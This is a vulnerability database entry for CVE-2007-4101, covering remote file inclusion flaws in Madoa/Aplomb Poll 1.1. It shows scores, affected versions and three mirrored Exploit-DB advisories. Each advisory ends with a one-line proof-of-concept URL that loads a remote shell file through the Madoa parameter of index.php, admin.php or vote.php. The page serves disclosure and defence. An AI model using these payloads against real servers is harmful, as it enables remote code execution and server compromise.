CVE-2007-4101
published 2007-07-31CVE-2007-4101: Multiple PHP remote file inclusion vulnerabilities in Madoa Poll 1.1 allow remote attackers to execute arbitrary PHP code via the Madoa parameter to (1)…
PriorityP339medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.91%
85.2th percentile
Multiple PHP remote file inclusion vulnerabilities in Madoa Poll 1.1 allow remote attackers to execute arbitrary PHP code via the Madoa parameter to (1) index.php, (2) vote.php, and (3) admin.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| global_centre | aplomb_poll | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Global Centre Aplomb Poll 1.1 - 'index.php?Madoa' Remote File Inclusion
exploitdb·2007-07-30
CVE-2007-4101 Global Centre Aplomb Poll 1.1 - 'index.php?Madoa' Remote File Inclusion
Global Centre Aplomb Poll 1.1 - 'index.php?Madoa' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/25138/info
Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Aplomb Poll 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?Madoa=http://sheel.txt?
Exploit-DB
Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion
exploitdb·2007-07-30
CVE-2007-4101 Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion
Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/25138/info
Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Aplomb Poll 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?Madoa=http://shell.txt?
Exploit-DB
Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion
exploitdb·2007-07-30
CVE-2007-4101 Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion
Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/25138/info
Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Aplomb Poll 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/vote.php?Madoa=http://sheel.txt?
No writeups or analysis indexed.
http://osvdb.org/37262http://osvdb.org/37263http://osvdb.org/37264http://securityreason.com/securityalert/2937http://www.attrition.org/pipermail/vim/2007-July/001739.htmlhttp://www.securityfocus.com/archive/1/475096/100/0/threadedhttp://www.securityfocus.com/bid/25138http://osvdb.org/37262http://osvdb.org/37263http://osvdb.org/37264http://securityreason.com/securityalert/2937http://www.attrition.org/pipermail/vim/2007-July/001739.htmlhttp://www.securityfocus.com/archive/1/475096/100/0/threadedhttp://www.securityfocus.com/bid/25138
2007-07-31
Published